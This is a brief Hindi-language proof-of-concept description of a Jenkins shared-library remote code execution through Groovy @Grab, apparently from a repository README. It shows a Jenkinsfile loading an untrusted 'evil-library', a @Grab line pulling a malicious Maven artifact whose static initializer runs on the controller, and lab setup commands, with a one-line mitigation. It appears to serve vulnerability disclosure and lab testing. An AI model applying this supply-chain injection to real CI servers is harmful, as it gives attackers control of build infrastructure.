
CVE-2026-22018 के लिए PoC, जो Groovy @Grab के माध्यम से एक गंभीर Jenkins Pipeline Shared Library RCE है, जो सप्लाई-चेन कोड इंजेक्शन और शमन चरणों को प्रदर्शित करता है।
@Grab के माध्यम से कोड निष्पादन// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
evilStep()
}
एक Jenkins pipeline ऐसे स्रोत से shared library लोड करती है जिस पर पूरी तरह से भरोसा नहीं किया जाता है। लाइब्रेरी बाहरी Maven artifacts को डाउनलोड करने के लिए @Grab एनोटेशन का उपयोग करती है, जिसमें एक दुर्भावनापूर्ण क्लास शामिल हो सकती है जो Groovy संकलन के दौरान Jenkins controller पर कोड निष्पादित करती है।
@Grab एनोटेशन runtime पर मनमाने JARs को लाता और लोड करता है; shared libraries सैंडबॉक्स नहीं होती हैं।ऐसी अविश्वसनीय लाइब्रेरी के साथ pipeline कॉन्फ़िगर करें जिसके vars/evilStep.groovy में @Grab('com.evil:malware:1.0') शामिल है। जब pipeline चलती है, तो दुर्भावनापूर्ण JAR का static initializer निष्पादित होता है।
@Grab अक्षम करें।git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.